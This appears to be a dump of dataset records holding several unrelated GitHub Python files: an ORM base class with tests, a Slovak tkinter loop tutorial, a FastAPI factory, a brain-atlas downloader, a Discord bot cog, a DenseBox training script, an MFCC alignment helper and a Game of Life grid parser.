ModelBase.model_data[self.child_class]['table_exists'] = True\n return True\n col_dict = {}\n for col in self.get_columns():\n col_dict[col] = getattr(self.child_class,col)[2]\n ModelBase.db_interface.create_table(self.get_tablename(),col_dict)\n ModelBase.model_data[self.child_class]['table_exists'] = True\n return True\n \n def save(self):\n \"\"\"\n save the model to the database\n if it's the first save, record the returned ID\n set _is_dirty to False\n \"\"\"\n self.verify_table_exists()\n if not self.id:\n self.id = ModelBase.db_interface.save_to_table(self.tablename,self.get_columns())\n elif self._is_dirty:\n ModelBase.db_interface.save_to_table(self.tablename,self.get_columns())\n self._is_dirty = False\n\n\ndef error_message(caller,err_num,tup):\n err_dict = {}\n err_dict[0] = [\"Class: %s has a default value of %s with type %s\", \\\n \"Supported default value types are the keys in config.TYPE_MAPPING\"]\n err_dict[1] = [\"Class: %s has a Python type of %s, which is not supported\", \\\n \"Supported Python types are the keys in config.TYPE_MAPPING\"]\n err_dict[2] = [\"Class: %s has an SQL type of %s, which is not supported\", \\\n \"Supported SQL types are the values in config.TYPE_MAPPING\"]\n err_dict[3] = [\"Class: %s has validator %s, which is not a function\", \\\n \"Item 4 must a function that takes one arg and returns a boolean\"]\n err_dict[4] = [\"Class: %s has has default value %s, which is not of Python type %s\", \\\n \"The default value must be None or the Python type in item 2\"]\n err_dict[5] = [\"No attr '%s' in this model\",\\\n \"Class: %s\"]\n err_dict[6] = [\"Value '%s' is of wrong type and cannot be cast as '%s'\",\\\n \"Class: %s\"]\n err_dict[7] = [\"Value '%s' failed custom validation in '%s'\", \\\n \"Error message from validator: %s\", \\\n \"Class: %s\"]\n final_message = \"ERROR in \" + caller + \"\\n\"\n for line in err_dict[err_num]:\n final_message += \"\\t\" + line + \"\\n\"\n return final_message % tup\n\n\n### EVERYTHING BELOW THIS LINE IS FOR TESTING ###\nif __name__ == \"__main__\":\n from random import randint\n \n def year_validator(year):\n if year < 1870:\n return \"Year must be greater than 1869\"\n return True\n \n class RealClass(ModelBase):\n id = (None,int,\"serial PRIMARY KEY\")\n title = (None,str,\"varchar\")\n year = (None,int,\"integer\",year_validator)\n \n\n class GoodModel(ModelBase):\n valid_attr = 
(\"valid\",str,\"varchar\")\n valid_attr2 = (True,bool,\"bool\")\n valid_attr3 = (17,int,\"smallint\",lambda x:x>10)\n \n class BadModel1(ModelBase):\n invalid_attr = (type,str,\"varchar\")\n \n class BadModel2(ModelBase):\n invalid_attr2 = (None,17,\"text\")\n \n class BadModel3(ModelBase):\n invalid_attr3 = (None,str,\"NOTSQL\")\n \n class BadModel4(ModelBase):\n invalid_attr4 = (17,str,\"integer\")\n\n m1 = RealClass.create()\n m2 = RealClass.create()\n m1.title = \"Back to the Future\"\n m1.year = \"1850\"\n m1.fake = 17\n assert (m1.title == \"Back to the Future\")\n assert (m1.year == None)\n assert (m1.fake == None)\n assert (m1 != m2)\n assert (m1.db_interface == m2.db_interface)\n assert (m1 in RealClass.get_all_models())\n assert (m2 in RealClass.get_all_models())\n m2.year = \"2000\"\n assert (m2.year == 2000)\n assert (m1._is_dirty)\n assert (m2._is_dirty)\n assert (m1.get_tablename() == \"realclass_table\")\n assert (GoodModel.check_model() == True)\n assert (BadModel1.create() == None)\n assert (BadModel2.create() == None)\n assert (BadModel3.create() == None)\n assert (BadModel4.create() == None)\n m1.save()\n assert (m1.id != None)\n","repo_name":"ajtmccarty/mediaTools","sub_path":"ModelBase.py","file_name":"ModelBase.py","file_ext":"py","file_size_in_byte":12740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14495184640","text":"import tkinter\n\ncanvas = tkinter.Canvas(height = 1000, width = 1000)\ncanvas.pack()\n\nx = 10\n\n# Pokial chceme nejaku cast kodu zopakovat n- krat, vieme ju vlozit do for cyklu.\n# Pocet opakovani uvedieme do zatvorky za range.\n# Tento nas kod sa zopakuje 15krat.\nfor i in range(15):\n# Kod, ktory chceme opakovat, musime odsadit pomocou tabu\n canvas.create_rectangle(x+10,30,x+30,70, fill = \"brown\")\n canvas.create_oval(x,10,x+40,30, fill = \"green\")\n x = x + 50\n\ny = 100\n\n# i-cko nabera rozne hodnoty podla toho, co je v zatvorke za range.\n# Ak je v nej iba jedno cislo n, tak i bude nedobudat hodnoty od 0 po n-1.\n\n# Vypis cisla od 0 do 9.\nfor i in range(10):\n canvas.create_text(20,y, text = i)\n y = y + 30\n\ny = 100\n\n# Ak su v zatvorke 2 cisla, prve z nich je prva hodnota, ktoru nadobudne,\n# druhe bude opat horna hranica.\n# range(a,n) teda vypise cisla od a do n-1\n\n# Vypis cisla od 1 do 10.\nfor i in range(1,11):\n canvas.create_text(50,y, text = i)\n y = y + 30\n\ny = 100\nfor i in range(10):\n canvas.create_text(80,y, text = i+1)\n y = y + 30\n \ny = 100\n\n# Ak su v zatvorke 2 cisla, prve z nich je prva hodnota, ktoru nadobudne,\n# druhe bude opat horna hranica, tretie velkost kroku, o ktoru sa cisla i zvacsuju.\n# range(a,n,b) teda vypise cisla: a, a+b, a+b+b... 
n-1\n\n\n# Vypis parne cisla mensie ako 10\nfor i in range(0,10,2):\n canvas.create_text(110,y, text = i)\n y = y + 30\n\ny = 100\nfor i in range(5):\n canvas.create_text(140,y, text = i*2)\n y = y + 30\n\ny = 100\n\n# Vypis cisla od 50 do 40\nfor i in range(50,40,-1):\n canvas.create_text(170,y, text = i)\n y = y + 30\n\n\ny = 100\nfor i in range(10):\n canvas.create_text(200,y, text = 50-i)\n y = y + 30\n","repo_name":"lootikfc/EvlPythonDruhaci","sub_path":"Cykly.py","file_name":"Cykly.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"sk","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72508912167","text":"from fastapi import FastAPI\n\nfrom instance import settings\nfrom lebonplantapi import controllers\nfrom lebonplantapi.adapters import database\nfrom lebonplantapi.logging import configure_logging\n\n\ndef create_app(name: str = __name__) -> FastAPI:\n\n app = FastAPI(\n title=name,\n version=settings.application_version,\n openapi_url=settings.openapi_url,\n docs_url=settings.swagger_ui_url,\n redoc_url=settings.redoc_url,\n debug=settings.fastapi_debug,\n )\n\n if not settings.fastapi_debug:\n configure_logging(settings.log_level)\n\n controllers.init_app(app)\n database.init_db()\n\n return app\n","repo_name":"LiquidNalee/LeBonPlantAPI","sub_path":"lebonplantapi/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70190820650","text":"\n\nimport api\nimport numpy as np\nimport json\n\nDATA_SET_ID = 479670988 # injection site at LGd\n\t\ndef DownloadInjectionCoordinates(dataSetId, injectionMaskThreshold):\n print(\"downloading injection mask coordinates\")\n header, arr, meta = api.DownloadDataSetVolume(dataSetId, 'injection') # note: most values in arr are just simply 0\n\n\t\n spacing = np.array(meta['ElementSpacing'])\n coords = np.argwhere(arr > injectionMaskThreshold) * spacing\n \n return coords.tolist() # injection coordinates in μm\n\ndata = {\n \"lines\": [],\n \"destinationCoordinates\": DownloadInjectionCoordinates(DATA_SET_ID, INJECTION_MASK_THRESHOLD)\n}\n\nabc = data['destinationCoordinates']\n\nwith open('data.json', 'wb') as f:\n f.write(json.dumps(data).encode())","repo_name":"lanstonchu/brain-connectivity","sub_path":"download_injection_only.py","file_name":"download_injection_only.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33599317200","text":"# Solve 2023-06-06\n\nimport sys\nfrom decimal import *\n\ngetcontext().prec = 70\ngetcontext().rounding = ROUND_HALF_UP\n\ninput = lambda : sys.stdin.readline().rstrip()\n\nfor _ in range(int(input())):\n ans = Decimal(\"0\")\n\n while True:\n x = input()\n if x == \"0\":\n break\n ans += Decimal(x)\n\n ans = str(ans)\n while ans.find(\".\") != -1 and ans[-1] == \"0\":\n ans = ans[:-1]\n if ans[-1] == \".\":\n ans = ans[:-1]\n print(ans)\n","repo_name":"infikei/algorithm","sub_path":"baekjoon_all/09000+/boj_9411.py","file_name":"boj_9411.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"19702171911","text":"\n\nclass Region(object):\n \"\"\"\n Stores info on signal / control region. Bits are stored as strings\n and used to look up real values. 
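# The Decimal-summation solution above strips trailing zeros by hand. A quick
# sketch of why: Decimal.normalize() looks tempting, but it renders 100 as
# 1E+2, so manual stripping keeps plain decimal notation.
from decimal import Decimal, getcontext

getcontext().prec = 70
total = Decimal('0.1') + Decimal('0.2') + Decimal('0.30')
s = str(total)                     # '0.60'
if '.' in s:
    s = s.rstrip('0').rstrip('.')
print(s)                           # '0.6'
print(Decimal('100').normalize())  # '1E+2' -- the pitfall the manual code avoids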
This class is also responsible for\n checking the integrity of its stored data.\n \"\"\"\n default_dict = {\n 'selection': 'signal',\n 'type':'signal',\n 'kinematics':{\n 'leading_jet_gev':240,\n 'met_gev':180,\n },\n 'btag_config':['NOTAG','LOOSE','TIGHT'],\n 'tagger':'JFC',\n 'jet_tag_assignment': 'PT_ORDERED'\n }\n _allowed_types = set(['control','signal','validation'])\n\n def __init__(self, yaml_dict={}):\n if not yaml_dict:\n yaml_dict = self.default_dict\n self._read_dict(yaml_dict)\n\n def __repr__(self):\n return repr(self.get_yaml_dict())\n\n def _read_dict(self,yaml_dict):\n self.type = yaml_dict['type']\n self.kinematics = yaml_dict['kinematics']\n self.btag_config = yaml_dict['btag_config']\n if self.type not in self._allowed_types:\n raise RegionConfigError('region type {} is not known'.format(\n self.type))\n self.tagger = yaml_dict.get('tagger', None)\n self.hists = yaml_dict.get('hists', 'NMINUS')\n self.jet_tag_assignment = yaml_dict.get(\n 'jet_tag_assignment','PT_ORDERED')\n self.boson_pt_correction = yaml_dict.get(\n 'boson_pt_correction', 'MARKS')\n\n def get_yaml_dict(self):\n \"\"\"\n returns the object as a dict for yaml\n \"\"\"\n # as long as the names don't change we can just dump the object data\n baselist = self.__dict__.items()\n base = {k:v for k, v in baselist if not k.startswith('_')}\n return base\n\n def get_config_dict(self):\n \"\"\"\n Produces the configuration info needed for _stacksusy\n \"\"\"\n config_dict = {\n 'selection': self.selection,\n 'jet_tag_requirements': self.btag_config,\n 'leading_jet_pt': self.kinematics['leading_jet_gev']*1e3,\n 'met': self.kinematics['met_gev']*1e3,\n 'type': self.type.upper(),\n 'hists': self.hists.upper(),\n 'tagger': _get_tagger(self.btag_config, self.tagger),\n 'jet_tag_assignment': self.jet_tag_assignment,\n 'boson_pt_correction': self.boson_pt_correction,\n }\n return config_dict\n\nclass SuperRegionKey(object):\n \"\"\"\n Constructed from a Region, compares identical if the regions fall in the\n same SuperRegion.\n\n Not clear that this is any cleaner than a simple tuple... maybe\n better to stick a superregion hash function in the region...\n \"\"\"\n def __init__(self, region):\n self.req_bits = region.get_bits()\n self.veto_bits = region.get_antibits()\n self.region_bits = region.get_region_bits()\n self.jet_tags = tuple(region.btag_config)\n self.region_type = region.type\n\n\nclass SuperRegion(object):\n \"\"\"\n Constructed from a list of regions. 
SuperRegions combine kinematics from\n normal regions.\n \"\"\"\n kinematics = ['leading_jet_gev', 'met_gev']\n def __init__(self, met_lower_bound=0, leading_jet_lower_bound=120):\n self.subregions = {}\n self.tuple = None\n self.kinematic_lower_bounds = {\n 'leading_jet_gev': leading_jet_lower_bound,\n 'met_gev': met_lower_bound}\n def add_subregion(self, name, region):\n reg_tuple = superregion_tuple(region)\n if self.tuple:\n if reg_tuple != self.tuple:\n raise ValueError(\n \"tried to add an incompatible subregion\"\n \" (adding {} to {})\".format(reg_tuple, self.tuple))\n else:\n self.tuple = reg_tuple\n for kin in self.kinematics:\n if region.kinematics[kin] < self.kinematic_lower_bounds[kin]:\n self.kinematic_lower_bounds[kin] = region.kinematics[kin]\n self.subregions[name] = region\n\n def get_common_name(self):\n subnames = self.subregions.keys()\n if not subnames:\n raise ValueError(\"no subregions in this superregion\")\n min_len = min(len(x) for x in subnames)\n if not min_len:\n return ''\n for cn in xrange(min_len):\n if any(name[cn] != subnames[0][cn] for name in subnames):\n return subnames[0][:cn]\n return subnames[0][:min_len]\n\n def get_yaml_dict(self):\n subregions = {\n n:v.get_yaml_dict() for n,v in self.subregions.iteritems()}\n output = {\n 'subregions':subregions,\n 'lower_bounds': self.kinematic_lower_bounds.copy(),\n }\n return output\n\n def get_config_dict(self):\n (req, veto, jtags, reg_type, reg_bits, jet_tag_ass,\n boson_pt_correction ) = self.tuple\n lower_bounds = self.kinematic_lower_bounds\n config_dict = {\n 'jet_tag_requirements': list(jtags),\n 'leading_jet_pt': lower_bounds['leading_jet_gev']*1e3,\n 'met': lower_bounds['met_gev']*1e3,\n 'required_bits': req,\n 'veto_bits': veto,\n 'region_bits': reg_bits,\n 'type': reg_type.upper(),\n 'hists': 'KINEMATIC_STAT',\n # ACHTUNG: dont care about tagger for untagged superregions\n 'tagger': _get_tagger(jtags,None),\n 'jet_tag_assignment': jet_tag_ass,\n 'boson_pt_correction': boson_pt_correction\n }\n return config_dict\n\n\ndef condense_regions(regions):\n \"\"\"\n get superregions from normal regions\n \"\"\"\n super_regions = {}\n for name, region in regions.iteritems():\n supertuple = superregion_tuple(region)\n if not supertuple in super_regions:\n super_regions[supertuple] = SuperRegion()\n super_regions[supertuple].add_subregion(name, region)\n used_names = {}\n named_regions = {}\n for region in super_regions.values():\n name = region.get_common_name()\n if name in used_names:\n used_names[name] += 1\n else:\n used_names[name] = 0\n final_name = name + str(used_names[name])\n named_regions[final_name] = region\n return named_regions\n\ndef superregion_tuple(region):\n req_bits = region.get_bits()\n veto_bits = region.get_antibits()\n region_bits = region.get_region_bits()\n jet_tags = tuple(region.btag_config)\n return (req_bits, veto_bits, jet_tags, region.type, region_bits,\n region.jet_tag_assignment, region.boson_pt_correction)\n\n\nclass RegionConfigError(ValueError):\n def __init__(self, message):\n super(RegionConfigError,self).__init__(message)\n\ndef _get_tagger(jet_tags, tagger):\n \"\"\"\n Figure out the tagger based on the tags used.\n \"\"\"\n jfc_tags = {j for j in jet_tags if j.startswith('JFC')}\n non_jfc = set(jet_tags) - jfc_tags - set(['NOTAG'])\n if tagger:\n if jfc_tags or non_jfc:\n raise RegionConfigError(\n \"should only specify tagger when op are given\")\n return tagger\n\n if jfc_tags and non_jfc:\n raise RegionConfigError(\n \"can't be mixing taggers (right now), tried 
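# condense_regions above is a group-by keyed on superregion_tuple; the same
# shape with plain stand-in data:
regions = {'cr_a': ('sig', 'LOOSE'), 'cr_b': ('sig', 'LOOSE'), 'vr_x': ('val', 'TIGHT')}
groups = {}
for name, key in regions.items():
    groups.setdefault(key, []).append(name)
print(groups)  # {('sig', 'LOOSE'): ['cr_a', 'cr_b'], ('val', 'TIGHT'): ['vr_x']}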
to use {}\".format(\n ', '.join(set(jet_tags))))\n if jfc_tags:\n return 'JFC'\n else:\n return 'CNN'\n","repo_name":"dguest/susy-analysis","sub_path":"python/scharm/stack/regions.py","file_name":"regions.py","file_ext":"py","file_size_in_byte":7333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35708406276","text":"import os\nfrom difflib import get_close_matches\n\nimport discord\nfrom discord import Webhook, RequestsWebhookAdapter\nfrom discord.ext import commands\n\nimport core.embeds as embeds\n\n\nclass ClipboardHelpCommand(commands.HelpCommand):\n async def send_bot_help(self, mapping):\n bot = self.context.bot\n\n cogs = [bot.get_cog(\"Clipboard\"), bot.get_cog(\"Settings\"), bot.get_cog(\"Misc\")]\n cog_commands = [cog.get_commands() for cog in cogs]\n\n help_embed = discord.Embed()\n help_embed.set_author(name=bot.user, icon_url=bot.user.avatar_url)\n help_embed.colour = 2228207\n help_embed.set_footer(text=f\"Use {self.clean_prefix}help [command] to get help for a specific command.\")\n\n for cog_command in cog_commands:\n value = '\\n'.join(\n [f\"**{self.clean_prefix}{command.qualified_name}** - *{command.short_doc.strip()}*\" for command in\n cog_command])\n value = value.replace(\" - **\", \"\")\n help_embed.add_field(\n name=cog_command[0].cog_name,\n value=value\n )\n await self.get_destination().send(embed=help_embed)\n\n async def send_command_help(self, command):\n bot = self.context.bot\n\n help_embed = discord.Embed()\n help_embed.set_author(name=bot.user, icon_url=bot.user.avatar_url)\n help_embed.colour = 2228207\n help_embed.set_footer(text=f\"Use {self.clean_prefix}help [command] to get help for a specific command.\")\n\n help_embed.title = f\"{self.clean_prefix}{command.qualified_name} {command.signature}\"\n description = command.help.split(\"~\")\n help_embed.add_field(name=\"Description\", value=description[0].replace(\"{prefix}\", self.clean_prefix))\n help_embed.add_field(name=\"Usage\",\n value=\"```\" + description[1].strip(\"\\n \").replace(\"{prefix}\", self.clean_prefix) + \"```\")\n try:\n help_embed.add_field(name=\"Note\", value=description[2].replace(\"{prefix}\", self.clean_prefix),\n inline=False)\n except IndexError:\n pass\n if command.aliases:\n aliases = \"`\" + \"`, `\".join(command.aliases) + \"`\"\n else:\n aliases = \"No aliases.\"\n help_embed.add_field(name=\"Aliases\", value=aliases, inline=False)\n help_embed.set_footer(\n text=f\"Use {self.clean_prefix}help to see all the commands.\" +\n \"\\n\" + \"\\u2501\" * 40 + \"\\n\" +\n \"[]'s are optional arguments. <>'s are required arguments.\")\n await self.get_destination().send(embed=help_embed)\n\n async def send_error_message(self, error):\n command = self.context.kwargs.get(\"command\")\n command_names = set()\n for cmd in self.context.bot.walk_commands():\n if not cmd.hidden:\n command_names.add(cmd.qualified_name)\n closest = get_close_matches(command, command_names, 2)\n if not closest:\n closest = get_close_matches(command, command_names, 1, 0)\n closest = \"` or `\".join(closest)\n await self.get_destination().send(embed=embeds.error(\n f\"Command `{command}` not found. 
Did you mean `{closest}`?\"\n ))\n\n\nclass Misc(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.bot.help_command = ClipboardHelpCommand(\n verify_checks=False,\n command_attrs={\n \"help\":\n \"\"\"\n Shows this help message.\n ~\n {prefix}help\n {prefix}help invite\n \"\"\"\n },\n )\n self.bot.help_command.cog = self\n\n @commands.command(aliases=[\"givemebot\"])\n async def invite(self, ctx):\n \"\"\"\n Get the invite link of the bot.\n ~\n {prefix}invite\n \"\"\"\n invite = f\"https://discordapp.com/api/oauth2/authorize?client_id={self.bot.user.id}&permissions=67584&scope=bot\"\n await ctx.send(embed=discord.Embed(\n color=discord.colour.Colour.teal(),\n description=f\":mailbox_with_mail: [Invite]({invite}) me to your server!\"))\n\n @commands.command()\n @commands.cooldown(1, os.environ.get(\"FEEDBACK_COOLDOWN\", 120), commands.BucketType.user)\n async def feedback(self, ctx, *, feedback):\n \"\"\"\n Send feedback about the bot.\n ~\n {prefix}feedback this bot is very good.\n {prefix}feedback I have a command idea...\n \"\"\"\n url = os.environ.get(\"FEEDBACK_WEBHOOK\", None)\n if url:\n webhook = Webhook.from_url(url, adapter=RequestsWebhookAdapter())\n embed = discord.Embed(description=feedback, colour=discord.Colour.teal())\n embed.set_author(name=f\"{ctx.author.name}#{ctx.author.discriminator}\", icon_url=ctx.author.avatar_url)\n embed.set_footer(text=f\"User id: {ctx.author.id}\")\n webhook.send(embed=embed)\n await ctx.send(embed=embeds.success(\"Sent the feedback!\"))\n else:\n await ctx.send(embed=embeds.error(\"This command is disabled.\"))\n\n @commands.command()\n async def ping(self, ctx):\n \"\"\"\n Gives the pong!\n ~\n {prefix}ping\n \"\"\"\n m = await ctx.send(\"One moment...\")\n t1 = ctx.message.created_at\n t2 = m.created_at\n rc = (t2 - t1).total_seconds()\n emoji = '☠️' if rc > 50 else ('😭' if rc > 5 else ('😨' if rc > 1 else '👌'))\n await m.edit(content=\"Pong! `{0:.3f}s` {1}\\n\".format(rc, emoji))\n\n\ndef setup(bot):\n bot.add_cog(Misc(bot))\n","repo_name":"RealCyGuy/Clipboard","sub_path":"cogs/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":5640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32571166985","text":"'''\n# -*- encoding: utf-8 -*-\n# 文件 : train.py\n# 说明 : 对模型进行训练\n# 时间 : 2022/06/27 16:58:41\n# 作者 : Hito\n# 版本 : 1.0\n# 环境 : pytorch1.7\n'''\n\n\nfrom net.densebox import DenseBox\nfrom net.loss import BCELoss\nfrom utils.utils import mask_by_sel\nfrom utils.dataloader import LPPatch_Offline\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport os\nimport numpy as np\nfrom utils.utils import get_lr\nimport shutil\n\n\n\ndef train(num_epoch=30,lambda_loc=3.0,base_lr=1e-4, resume=None, save_folder='./weights'):\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n train_set = LPPatch_Offline(root='./dataset', transform=None, size=(240, 240))\n batch_size = 10\n train_loader = torch.utils.data.DataLoader(dataset=train_set, batch_size=batch_size, shuffle=True, num_workers=4)\n # network\n net = DenseBox().to(device)\n # ---------------- whether to resume from checkpoint\n if resume is not None:\n if os.path.isfile(resume):\n net.load_state_dict(torch.load(resume))\n print('=> net resume from {}'.format(resume))\n else:\n print('=> [Note]: invalid resume path @ %s, resume failed.' 
% resume)\n    \n    \n    # ---------------- loss functions\n    # element-wise L2 loss\n    loss_func = nn.MSELoss(reduce=False).to(device)\n    # loss_func = nn.BCELoss(reduce=False).to(device)\n\n    # optimization function\n    # optimizer = torch.optim.SGD(net.parameters(), lr=base_lr, momentum=9e-1, weight_decay=5e-4) # 5e-4\n    \n    lr = 1e-3\n    optimizer = optim.Adam(net.parameters(),lr,weight_decay=5e-4)\n    lr_scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=5, eta_min=1e-5)\n    # lr_scheduler = optim.lr_scheduler.StepLR(optimizer,step_size=1,gamma=0.95)\n    \n    if os.path.exists(save_folder):\n        shutil.rmtree(save_folder)\n    os.makedirs(save_folder)\n    \n    \n    print('\\nTraining...')\n    net.train()\n\n    for epoch_i in range(num_epoch):\n        for batch_i, (data, label_map, loss_mask) in enumerate(train_loader):\n            # ------------- put data to device\n            data, label_map = data.to(device), label_map.to(device) # n,3,240,240 # n,5,60,60\n\n            # ------------- clear gradients\n            optimizer.zero_grad()\n\n            # ------------- forward pass\n            score_out, loc_out = net.forward(data)\n\n            # ------------- loss calculation with hard negative mining\n            score_map_gt = label_map[:, 0] # n,60,60\n            score_map_gt = score_map_gt.unsqueeze(1) # n,1,60,60\n            loc_map_gt = label_map[:, 1:] # n,4,60,60\n\n            positive_indices = torch.nonzero(score_map_gt) # m,4: m is the number of non-zero elements, and the 4 columns are each element's position indices\n            positive_num = positive_indices.size(0)\n\n            # to keep the ratio of positive to negative samples at 1\n            negative_num = int(float(positive_num) / float(data.size(0)) + 0.5)\n            score_out = torch.sigmoid(score_out)\n            score_loss = loss_func(score_out, score_map_gt)\n            # score_loss = BCELoss(score_out, score_map_gt) # n,1,60,60\n\n            # loc loss should be masked by label scores and to be summed\n            loc_loss = loss_func(loc_out, loc_map_gt) # n,4,60,60\n\n            # negative sampling... 
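keep the hardest (highest-loss) half of the negatives and draw the other half at random, so easy background pixels don't dominate the gradient\n            # 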
debug\n ones_mask = torch.ones([data.size(0), 1, 60, 60],\n dtype=torch.float32).to(device)\n neg_mask = ones_mask - score_map_gt\n negative_score_loss = score_loss * neg_mask\n\n half_neg_num = int(negative_num * 0.5 + 0.5)\n negative_score_loss = negative_score_loss.view(data.size(0), -1)\n hard_negs, hard_neg_indices = torch.topk(input=negative_score_loss,\n k=half_neg_num,\n dim=1)\n\n rand_neg_indices = torch.zeros([data.size(0), half_neg_num],\n dtype=torch.long).to(device)\n for i in range(data.size(0)):\n indices = np.random.choice(3600, # 60 * 60\n half_neg_num,\n replace=False)\n indices = torch.Tensor(indices)\n rand_neg_indices[i] = indices\n\n # concatenate negative sample ids 所选定的负样本,包括损失最大的负样本和随机筛选的(各占负样本的一半),负样本总数为正样本的一半\n neg_indices = torch.cat((hard_neg_indices, rand_neg_indices), dim=1)\n\n neg_indices = neg_indices.cpu()\n positive_indices = positive_indices.cpu()\n\n # fill the loss mask\n mask_by_sel(loss_mask=loss_mask,\n pos_indices=positive_indices,\n neg_indices=neg_indices)\n\n # ------------- calculate final loss\n loss_mask = loss_mask.to(device)\n\n mask_score_loss = loss_mask * score_loss\n mask_loc_loss = loss_mask * score_map_gt * loc_loss\n\n loss = torch.sum(mask_score_loss) + torch.sum(lambda_loc * mask_loc_loss)\n\n # ------------- back propagation\n loss.backward()\n optimizer.step()\n\n # ------------- print loss\n iter_count = epoch_i * len(train_loader) + batch_i\n if iter_count % 10 == 0:\n print('=> epoch {} iter {:>3d}/{:>3d}'\n ', total_iter {:>5d} '\n ', lr {:>.8f} '\n ', mask_loss {:>5.3f} '\n ', local_loss {:>5.3f} '\n '| loss {:>5.3f}'\n .format(epoch_i + 1,\n batch_i,\n len(train_loader),\n iter_count,\n get_lr(optimizer),\n torch.sum(mask_score_loss).item(),\n torch.sum(lambda_loc * mask_loc_loss).item(),\n loss.item()))\n\n # ------------ save checkpoint\n torch.save(net.state_dict(), save_folder+'/model_' + str(epoch_i) + '.pth')\n print('<= {} saved.\\n'.format(save_folder+'/model_' + str(epoch_i) + '.pth'))\n \n lr_scheduler.step()\n\n torch.save(net.state_dict(), save_folder+'/model_final.pth')\n print('<= {} saved.\\n'.format(save_folder+'/model_final.pth'))\n \n\n\nif __name__ == \"__main__\":\n resume = 'model_2.pth'\n train(num_epoch=100, lambda_loc=3.0, resume=resume)\n","repo_name":"hito0512/DenseBox","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5585310255","text":"from pydub import AudioSegment\nimport numpy as np\nimport python_speech_features as psf\nfrom fastdtw import fastdtw\nfrom scipy.spatial.distance import euclidean\nimport matplotlib.pyplot as plt\n\ndef get_aligned_mfccs(file_pair, output_length):\n \"\"\"\n Takes a pair of file paths, returns aligned MFCC coefficients for the two\n audio clips\n \"\"\"\n mfccs = []\n \n for file in file_pair: \n \n sound = AudioSegment.from_file(file) \n samples = np.array(list(sound.get_array_of_samples()))\n \n mfcc_samples = psf.mfcc(samples,\n samplerate=16000,\n winlen=0.025,\n winstep=0.01,\n numcep=13,\n nfilt=26,\n nfft=512,\n lowfreq=0,\n highfreq=None,\n preemph=0.97,\n ceplifter=22,\n appendEnergy=True)\n \n mfccs.append(mfcc_samples)\n \n sample = mfccs[0]\n target = mfccs[1]\n \n distance, path = fastdtw(sample, target, dist=euclidean)\n \n sample_aligned = [sample[i] for (i, j) in path]\n target_aligned = [target[j] for (i, j) in path]\n \n aligned_length = len(sample_aligned)\n \n head_padding = [np.zeros(13) for i in 
range((output_length - aligned_length) // 2)]\n tail_padding = [np.zeros(13) for i in range((output_length - aligned_length) // 2)]\n \n padded_sample = head_padding + sample_aligned + tail_padding\n padded_target = head_padding + target_aligned + tail_padding\n \n return (np.array(padded_sample), np.array(padded_target))\n\ndef reconstruct_from_mfcc(coeffs):\n pass\n\n\nprint(get_aligned_mfccs((\"Data/kaggle_cuts/bosnian3/Wednesday.mp3\",\"Data/kaggle_cuts/english368/Wednesday.mp3\"), 250)[0][125])","repo_name":"sspusapaty/accenttransfer","sub_path":"genMCCData.py","file_name":"genMCCData.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15447350489","text":"from collections import Counter\n\nfrom mesa.space import Grid\n\nfrom agents.CellAgent import CellAgent\n\n\nclass GridParser:\n\n def __init__(self, grid_filename, model=None, torus=True, alive_char=None, dead_char=None):\n self.parsed_grid = self.__parse_text(grid_filename)\n self.torus = torus\n self.model = model\n self.alive_char = alive_char\n self.dead_char = dead_char\n\n def get_shape(self):\n width, height = self.__get_shape(self.parsed_grid)\n return width, height\n\n def get_grid(self):\n width, height = self.get_shape()\n grid = Grid(width, height, self.torus)\n alive_char, dead_char = self.__get_alive_dead_char(self.parsed_grid, self.alive_char, self.dead_char)\n grid = self.__populate_grid(self.parsed_grid, grid, self.model, alive_char, dead_char)\n return grid\n\n @staticmethod\n def __parse_text(grid_filename):\n with open(grid_filename, 'r') as f:\n return f.read().split('\\n')\n\n @staticmethod\n def __get_shape(parsed_grid):\n height = len(parsed_grid)\n width = len(parsed_grid[0])\n\n for line in parsed_grid:\n if len(line) != width:\n raise ValueError('Not equal length of rows.')\n return width, height\n\n @staticmethod\n def __get_alive_dead_char(parsed_grid, alive_char, dead_char):\n if alive_char is not None and dead_char is not None:\n return alive_char, dead_char\n return GridParser.__find_alive_dead(parsed_grid)\n\n @staticmethod\n def __find_alive_dead(parsed_grid):\n counter = Counter(''.join(parsed_grid))\n if len(counter) > 2:\n raise ValueError(f'More than two values in grid file.')\n dead_char = counter.most_common(2)[0][0] # First record, char\n alive_char = counter.most_common(2)[1][0] # Second record, char\n return alive_char, dead_char\n\n @staticmethod\n def __populate_grid(parsed_grid, grid, model, alive_char, dead_char):\n for x, row in enumerate(reversed(parsed_grid)):\n for y, el in enumerate(row):\n if el == alive_char:\n agent = CellAgent((x, y), model, CellAgent.STATE_ALIVE)\n elif el == dead_char:\n agent = CellAgent((x, y), model, CellAgent.STATE_DEAD)\n else:\n raise ValueError('Parsing error.')\n grid.place_agent(agent, (y, x))\n return grid\n","repo_name":"pfilo8/Agent-based-modeling","sub_path":"Assignment-3/utils/GridParser.py","file_name":"GridParser.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 